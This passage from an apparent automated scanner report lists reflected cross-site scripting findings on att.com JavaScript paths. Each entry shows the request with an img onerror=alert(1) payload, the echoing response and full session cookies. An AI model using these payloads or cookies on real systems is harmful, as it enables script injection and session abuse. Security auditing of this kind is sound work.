User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:39 GMT
Connection: keep-alive
Set-Cookie: TLTHID=A9D148FA7125107197819E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/posUtil.jsb568f"><img src=a onerror=alert(1)>4c096ab377d">
...[SNIP]...

3.724. https://www.att.com/olam/js/registration.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/registration.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f296"><img%20src%3da%20onerror%3dalert(1)>7b37fb08545 was submitted in the REST URL parameter 2. This input was echoed as 3f296"><img src=a onerror=alert(1)>7b37fb08545 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js3f296"><img%20src%3da%20onerror%3dalert(1)>7b37fb08545/registration.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9093
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js3f296"><img src=a onerror=alert(1)>7b37fb08545/registration.js">
...[SNIP]...

3.725. https://www.att.com/olam/js/registration.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/registration.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea74f"><img%20src%3da%20onerror%3dalert(1)>36c158259c5 was submitted in the REST URL parameter 3. This input was echoed as ea74f"><img src=a onerror=alert(1)>36c158259c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/registration.jsea74f"><img%20src%3da%20onerror%3dalert(1)>36c158259c5 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9093
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:41 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA874D587125107197919E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/registration.jsea74f"><img src=a onerror=alert(1)>36c158259c5">
...[SNIP]...

3.726. https://www.att.com/olam/js/sniffer.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/sniffer.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9dbb"><img%20src%3da%20onerror%3dalert(1)>2ad5590c1ca was submitted in the REST URL parameter 2. This input was echoed as c9dbb"><img src=a onerror=alert(1)>2ad5590c1ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsc9dbb"><img%20src%3da%20onerror%3dalert(1)>2ad5590c1ca/sniffer.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:34 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsc9dbb"><img src=a onerror=alert(1)>2ad5590c1ca/sniffer.js">
...[SNIP]...

3.727. https://www.att.com/olam/js/sniffer.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/sniffer.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f9f"><img%20src%3da%20onerror%3dalert(1)>244f3de8fc was submitted in the REST URL parameter 3. This input was echoed as a7f9f"><img src=a onerror=alert(1)>244f3de8fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/sniffer.jsa7f9f"><img%20src%3da%20onerror%3dalert(1)>244f3de8fc HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9087
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA0D523C7125107197869E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/sniffer.jsa7f9f"><img src=a onerror=alert(1)>244f3de8fc">
...[SNIP]...

3.728. https://www.att.com/olam/js/tool-tips.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/tool-tips.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ed91"><img%20src%3da%20onerror%3dalert(1)>28b739d7fdf was submitted in the REST URL parameter 2. This input was echoed as 2ed91"><img src=a onerror=alert(1)>28b739d7fdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js2ed91"><img%20src%3da%20onerror%3dalert(1)>28b739d7fdf/tool-tips.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9090
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js2ed91"><img src=a onerror=alert(1)>28b739d7fdf/tool-tips.js">
...[SNIP]...

3.729. https://www.att.com/olam/js/tool-tips.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/tool-tips.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97aac"><img%20src%3da%20onerror%3dalert(1)>31f6632615b was submitted in the REST URL parameter 3. This input was echoed as 97aac"><img src=a onerror=alert(1)>31f6632615b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/tool-tips.js97aac"><img%20src%3da%20onerror%3dalert(1)>31f6632615b HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9090
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA0D3B627125107197859E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/tool-tips.js97aac"><img src=a onerror=alert(1)>31f6632615b">
...[SNIP]...

3.730. https://www.att.com/olam/js/validate.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/validate.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e2da"><img%20src%3da%20onerror%3dalert(1)>104eda6ef9b was submitted in the REST URL parameter 2. This input was echoed as 6e2da"><img src=a onerror=alert(1)>104eda6ef9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js6e2da"><img%20src%3da%20onerror%3dalert(1)>104eda6ef9b/validate.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; 